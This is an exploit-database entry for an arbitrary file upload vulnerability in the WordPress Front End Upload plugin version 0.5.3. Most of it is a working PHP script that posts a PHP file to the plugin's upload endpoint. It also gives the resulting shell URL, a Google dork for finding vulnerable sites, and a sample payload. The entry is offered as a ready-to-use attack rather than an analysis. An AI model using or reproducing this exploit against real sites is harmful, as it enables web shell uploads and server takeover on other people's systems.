Wordpress Front End Upload 0.5.3 Arbitrary File Upload

2012-06-07T00:00:00
ID 1337DAY-ID-18477
Type zdt
Reporter Sammy FORGIT
Modified 2012-06-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Description : Wordpress Plugins - Front End Upload Shell Upload Vulnerability
Version : 0.5.3
Link : http://wordpress.org/extend/plugins/front-end-upload/
Plugins : http://downloads.wordpress.org/plugin/front-end-upload.0.5.3.zip
Google Dork : inurl:/wp-content/plugins/front-end-upload/


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/front-end-upload/upload.php?name=test.php&chunk=0&chunks=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/wordpress/wp-content/uploads/iti_feu_uploads_4fc8be0ed4aca/test.php

lo.php
<?php
phpinfo();
?>



#  0day.today [2018-03-01]  #